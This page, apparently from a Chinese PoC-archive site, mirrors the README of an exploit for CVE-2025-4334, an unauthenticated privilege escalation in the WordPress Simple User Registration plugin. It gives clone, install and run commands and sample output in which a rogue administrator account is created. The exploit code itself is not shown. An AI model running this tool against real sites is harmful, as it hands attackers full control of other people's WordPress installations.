目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2025-4334 PoC — WordPress plugin Simple User Registration 安全漏洞

来源
https://github.com/zr1p3r/CVE-2025-4334
关联漏洞
标题:WordPress plugin Simple User Registration 安全漏洞 (CVE-2025-4334)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Simple User Registration 6.3及之前版本存在安全漏洞,该漏洞源于用户元值限制不足,可能导致权限提升。
Description
Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.
介绍
<p align="center">
  <img src="https://s.w.org/style/images/about/WordPress-logotype-wmark.png" alt="WordPress Logo" width="150"/>
</p>

# CVE-2025-4334 - Simple User Registration <= 6.3 Unauthenticated Privilege Escalation

**Exploit Title:** Simple User Registration <= 6.3 – Unauthenticated Privilege Escalation
**Author:** Gaurav Bhattacharjee (0xgh057r3c0n)
**CVE ID:** CVE-2025-4334

This exploit targets a vulnerability in the **Simple User Registration plugin for WordPress (<= v6.3)**, allowing **unauthenticated attackers** to escalate privileges and create a new administrator account.

---

## ⚙️ Installation

Clone the repository and install the required Python dependencies:

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
```

Dependencies:

* `requests`
* `colorama`

---

## 🚀 Usage

```bash
python3 CVE-2025-4334.py -u <base_url> --form <form_url>
```

**Arguments:**

* `-u / --url` → Base WordPress URL (e.g. `https://target.com/wordpress/`)
* `--form` → Full URL of the registration form (e.g. `https://target.com/wpr/default-registration/`)

**Example:**

```bash
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
```

---

## 📜 Sample Output

```
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : test@admin.com
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
```

---

## ⚠️ Disclaimer

This tool is provided for **educational and research purposes only**.
Unauthorized use against systems without permission is illegal.
The author takes **no responsibility** for misuse.

---

## 📄 License

This project is licensed under the [MIT License](LICENSE).

---
文件快照

 [4.0K]  /data/pocs/be32ae522fc5c4717c6c041753ae43d9d42acf9d
├── [4.9K]  CVE-2025-4334.py
├── [2.8K]  CVE-2025-4334.yaml
├── [1.1K]  LICENSE
├── [2.1K]  README.md
└── [  18]  requirements.txt

1 directory, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。